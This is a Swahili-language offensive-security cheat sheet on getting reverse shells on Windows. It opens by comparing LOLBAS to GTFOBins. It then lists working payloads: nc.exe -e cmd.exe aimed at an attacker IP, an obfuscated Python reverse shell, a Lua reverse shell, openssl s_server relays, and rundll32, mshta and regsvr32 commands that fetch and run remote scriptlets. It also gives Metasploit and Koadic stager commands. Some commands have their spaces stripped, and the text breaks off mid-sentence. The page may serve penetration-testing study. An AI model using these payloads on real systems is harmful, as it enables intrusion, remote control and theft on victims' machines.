Ukurasa lolbas-project.github.io ni kwa Windows kama https://gtfobins.github.io/ ni kwa linux.
Kwa dhahiri, hakuna faili za SUID au mamlaka ya sudo kwenye Windows, lakini ni muhimu kujua jinsi baadhi ya binari zinaweza kutumika (kwa ubaya) kutekeleza aina fulani ya hatua zisizotarajiwa kama kutekeleza nambari za kupindukia.
NC
nc.exe-ecmd.exe<Attacker_IP><PORT>
SBD
sbd ni mbadala wa Netcat uliounganifu na salama. Inafanya kazi kwenye mifumo inayofanana na Unix na Win32. Ikiwa na sifa kama encryption imara, utekelezaji wa programu, bandari za chanzo zinazoweza kubadilishwa, na uunganisho endelevu, sbd hutoa suluhisho la kipekee kwa mawasiliano ya TCP/IP. Kwa watumiaji wa Windows, toleo la sbd.exe kutoka usambazaji wa Kali Linux linaweza kutumika kama mbadala thabiti wa Netcat.
#WindowsC:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
Perl
Perl ni lugha ya programu ambayo inaweza kutumika kwa ufanisi kujenga shellcode kwa mifumo ya Windows.
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
OpenSSH
Mvamizi (Kali)
opensslreq-x509-newkeyrsa:4096-keyoutkey.pem-outcert.pem-days365-nodes#Generate certificateopenssls_server-quiet-keykey.pem-certcert.pem-port<l_port>#Here you will be able to introduce the commandsopenssls_server-quiet-keykey.pem-certcert.pem-port<l_port2>#Here yo will be able to get the response
Powershell ni lugha ya skripti iliyoundwa na Microsoft kwa madhumuni ya kufanya usimamizi wa mfumo na automatiseringi. Inaweza kutumika kwa ufanisi katika uchunguzi wa dijiti na upenyezaji wa mtandao.
Mchakato unatekeleza wito wa mtandao: powershell.exe
Mzigo ulioandikwa kwenye diski: HAPANA (angalau mahali popote nilipoweza kupata kwa kutumia procmon!)
<?XML version="1.0"?><!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) --><scriptlet><public></public><scriptlanguage="JScript"><![CDATA[var r = new ActiveXObject("WScript.Shell").Run("calc.exe");]]></script></scriptlet>
Rundll32 - Metasploit
usewindows/smb/smb_deliveryrun#You will be given the command to run in the victim: rundll32.exe \\10.2.0.5\Iwvc\test.dll,0
Rundll32 - Koadic
usestager/js/rundll32_jssetSRVHOST192.168.1.107setENDPOINTsalesrun#Koadic will tell you what you need to execute inside the victim, it will be something like:rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","http://10.2.0.5:9997/ownmG",false);x.send();eval(x.responseText);window.close();
usemulti/script/web_deliverysettarget3setpayloadwindows/meterpreter/reverse/tcpsetlhost10.2.0.5run#You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll
Unaweza kupakua na kutekeleza kwa urahisi sana koadic zombie ukitumia stager regsvr
Katika folda ya Shells, kuna mabakuli mengi tofauti. Ili kupakua na kutekeleza Invoke-PowerShellTcp.ps1 fanya nakala ya hati na ongeza mwishoni mwa faili: